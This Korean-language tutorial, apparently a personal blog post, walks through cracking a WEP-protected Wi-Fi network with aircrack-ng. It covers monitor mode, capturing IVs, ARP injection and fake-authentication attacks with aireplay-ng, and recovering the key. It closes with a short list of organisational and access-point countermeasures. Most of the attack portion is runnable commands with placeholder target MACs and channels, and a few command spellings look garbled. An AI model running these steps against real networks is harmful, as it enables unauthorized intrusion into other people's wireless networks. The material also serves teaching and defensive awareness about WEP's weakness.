WEP 크래킹


우선 무선 랜카드가 모니터(Monitor) 모드를 지원하는지 확인해야한다.


ifconfig



(무선랜 확인)


iwconfig


(무선랜 확인)


airmon-ng



(모니터 모드 지원 여부 확인)


wlan 이나 ath 가 무선 랜을 의미한다


모니터 모드를 시작하자


airmod-ng start wlan0



ifconfig



(mon0 확인)



(mon0 확인)



(mon0 확인)


이제 airodump-ng mon0을 입력하여 주변 AP를 검색하자



  항목

  설명 

  BSSID

  AP MAC 주소 

  PWD 

  수신율 

  Beacons 

  Beacon Frame Message 카운트 수 

  CH 

  채널 번호 

  CIPHER 

  인증 방법 

  AUTH 

  인증 방식 

  ESSID 

  AP의 SSID 
















<무선 AP 정보 항목 설명>


공격할 AP의 BSSID와 ch를 확인했으면


Ctrl + C 로 정지하고 


airmon-ng stop mon0



airmon-ng start wlan0 7



잘안된다면 airmon-ng --help쳐보자




이제 IV 값을 수집해야한다


약 5000개 마다 다시 반복될 확률이 50%라고했던거같다. 많이 수집해보자


airodump-ng -channel [채널] --bssid [타겟맥주소] -w  [저장] mon0




잘안된다면 airodump-ng --help로 도움말을 보자



IV값 수집이 느리다면 ARP 인젝션 공격(Injection Attack)을 통해 단시간 내에 많은 IV 값을 수집할 수 있다.


aireplay-ng -3 -b [타겟맥주소] -h [무선랜카드맥주소] mon0

(오류가 난다면 airmon-ng check 와 airmon-ng check kill 을 입력하고 해보자)


(-3는 ARP 인젠션 공격이다 aireplay --help 참조)


이미 AP와 통신중인 MAC 주소를 이용한 패킷 발생 공격이기 때문에 한대 이상의


스테이션(Station)이 결합돼 있어야 한다.


(ARP 인젠션 공격 모습)

(airodump-ng 터미널을 보면 #Data 값이 엄청 올라가고 있는걸 볼 수 있다.)





또 한가지 방법은 Fake Authentication이다


가짜 인증으로 IV이 발생하게 만든다


aireplay-ng -1 -0 -a [AP맥주소] mon0

(오류가 난다면 airmon-ng check 와 airmon-ng check kill 을 입력하고 해보자)


(Fake Authentication 공격 모습)


이제 키 값을 크랙해보자


충분히 IV 값을 모왔다면 키를 찾았다고 아래와 같이 뜰 것이고 IV값이 모자르면


실패했다고 뜬다.


aircrack-ng wep-??.cap



(키찾기 성공시 화면)


(키 찾기 실패시 화면)


WEP는 조금만 IV값을 수집하면 바로 패스워드를 찾을수있다는걸 실습해봤다


요즘은 WEP를 쓰는 사람은 없을거같지만 혹시라도 사용하고 있다면 바꾸길 바란다..




WEP 키 크래킹에 대한 보안 대책


1. 사용자 제어 정책

-무선 랜 사용과 관련된 조직의 보안 정책 개발

-무선 랜 사용자에 대한 보안 교육

-건물과 무선 랜 장비 사용 장소에 대한 물리적인 접근 제어

-집단 내에 보유한 무선 랜 장비의 목록 작성/관리

-WEP 암호화 사용금지


2. AP 제어 정책

-무선 랜카드와 AP의 보안 패치 적용

-AP 송신 파워 조절

-AP 설치 시 외부와 인접한 장소(벽, 창문 등) 회피

-AP 설치 시 외부에 신호가 노출되지 않게 주변 벽 재질을 RF 감쇠율이 높은 금속으로 사용

-미사용 AP 전원 차단

-AP의 Beacon 패킷(SSID 브로드캐스트) 기능 차단

-AP의 SSID 설정 시 부서명, 회사명, 제품명 등의 사용 금지

-MAC 필터링을 이용해 인가된 사용자만 접근 허용


3. IDPS 제어

-WIDPS 관리자, WIDPS 센서 설치 후 관제와 침입 차단